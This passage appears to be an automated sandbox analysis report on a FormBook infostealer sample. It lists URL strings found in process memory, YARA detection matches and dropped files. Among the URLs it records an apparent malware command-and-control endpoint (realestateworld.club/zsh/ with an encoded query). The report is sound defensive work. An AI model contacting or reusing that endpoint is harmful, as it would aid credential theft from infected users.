          Source: explorer.exe, 00000006.00000002.2382532795.0000000001C70000.00000002.00000001.sdmp, chkdsk.exe, 00000009.00000002.2382312066.00000000009D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: chkdsk.exe, 00000009.00000002.2382275945.000000000064C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/ocid=iehp
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2203185538.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2217628937.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.realestateworld.club
          Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.realestateworld.club/zsh/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2C
          Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
          Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: chkdsk.exe, 00000009.00000002.2383604517.0000000002F1F000.00000004.00000001.sdmpString found in binary or memory: https://www.realestateworld.club/zsh/?bF=sOdpdc8WylSE20oUMI6XEqumhVh4hEgg3qNX/lZ/ecXaPMOIO0KiFboY7hZ

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrv.iniJump to dropped file
          Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrf.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
